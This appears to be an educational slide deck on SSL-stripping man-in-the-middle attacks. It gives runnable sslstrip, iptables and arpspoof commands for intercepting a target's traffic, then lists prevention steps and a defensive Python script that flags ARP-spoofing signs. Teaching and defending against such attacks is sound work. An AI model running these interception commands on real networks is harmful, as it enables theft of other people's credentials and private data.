• Animesh Gupta

Man-in-the-Middle Attack on SSL



HTTP vs HTTPS?


Instead of HyperText Transfer Protocol (HTTP), this website uses HyperText Transfer Protocol Secure (HTTPS). Using HTTPS, the computers agree on a "code" between them, and then they scramble the messages using that "code" so that no one in between can read them. This keeps your information safe from hackers.





How Does SSL Work?



A browser or server attempts to connect to a website (i.e. a web server) secured with SSL.

The browser/server requests that the web server identify itself. The web server sends the browser/server a copy of its SSL certificate.

The browser/server checks to see whether or not it trusts the SSL certificate. If so, it sends a message to the web server.

The web server sends back a digitally signed acknowledgement to start an SSL encrypted session. Encrypted data is shared between the browser/server and the web server.


Common SSL Misconceptions


HTTPS means I am secure right?


What about…

−SSL version 2.0 flaws

−Weak Ciphers < 128 bit

−Certificate keys < 1024 bits

−Client vulnerabilities

−Server vulnerabilities

−Application vulnerabilities


SSL can provide a false sense of security


SSL SPOOFING


Common HTTP/HTTPS Connection



Hijacking Communications




Using SSL Strip


1. Get sslstrip


A. Download and install sslstrip and arpspoof (linux only)


http://www.thoughtcrime.org/software.html  http://sourceforge.net/projects/arpspoof/


B. Get Kali Linux


https://www.kali.org/downloads/


Using sslstrip


2. Configure attack machine for IP forwarding.


echo "1" > /proc/sys/net/ipv4/ip_forward


3. Route all HTTP traffic to sslstrip.


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321


4. Run sslstrip.


sslstrip -l 54321


5. Configure ARP spoofing.


arpspoof -i eth0 -t <targetIP> <gatewayIP>


6. Launch a sniffer and collect data.


https://www.wireshark.org/


Expanding the attack


What if a root certificate could be installed on the target?


The attacker could potentially replace the certificate and maintain a secure connection.


Preventing SSL Spoofing


  1. Ensure you are using secure connections. Look for the HTTPS.

  2. Be careful about where you use secure sites.

  3. Secure machines on the network.

  4. Use static ARP tables.*
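For items 3 and 4, a defender can audit a Linux host's ARP cache for the state that ARP spoofing (step 5 above) leaves behind. The following is an added example, not part of the original slides: it parses text in the /proc/net/arp layout and reports a MAC that answers for several IPs, a gateway MAC that differs from a known-good value, and a gateway entry that is not static. The sample table, the addresses and the function names are constructed for illustration.

```python
from collections import defaultdict

ATF_COM, ATF_PERM = 0x2, 0x4   # Linux ARP flags: entry complete / static (permanent)

# Constructed sample in /proc/net/arp layout; all addresses are made up.
SAMPLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         08:00:27:aa:bb:cc     *        eth0
192.168.1.23     0x1         0x2         08:00:27:aa:bb:cc     *        eth0
192.168.1.40     0x1         0x2         52:54:00:12:34:56     *        eth0
192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        eth0
"""

def parse_arp_table(text):
    """Return {ip: (mac, flags)} for completed entries."""
    entries = {}
    for line in text.splitlines()[1:]:        # first row is the column header
        fields = line.split()
        if len(fields) < 6:
            continue
        flags = int(fields[2], 16)
        if flags & ATF_COM:                   # skip unresolved entries
            entries[fields[0]] = (fields[3].lower(), flags)
    return entries

def find_spoof_indicators(entries, gateway_ip, known_gateway_mac=None):
    """Return a list of (kind, mac, ips) findings."""
    findings = []
    by_mac = defaultdict(list)
    for ip, (mac, _) in entries.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        # One MAC answering for several IPs is what a poisoned cache looks like;
        # proxy ARP and multi-homed hosts can also cause it, so treat it as a lead.
        if len(ips) > 1:
            findings.append(("duplicate-mac", mac, sorted(ips)))
    if gateway_ip in entries:
        mac, flags = entries[gateway_ip]
        if known_gateway_mac and mac != known_gateway_mac.lower():
            findings.append(("gateway-mac-mismatch", mac, [gateway_ip]))
        if not flags & ATF_PERM:
            findings.append(("gateway-not-static", mac, [gateway_ip]))
    return findings

if __name__ == "__main__":
    for finding in find_spoof_indicators(parse_arp_table(SAMPLE), "192.168.1.1",
                                         known_gateway_mac="08:00:27:00:00:01"):
        print(finding)
```

On a live host, pass the contents of /proc/net/arp instead of the sample and supply the gateway MAC recorded while the network was known to be clean.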

[Images: "Normal" and "Stripped"]


©2019 Security Unleashed | New Delhi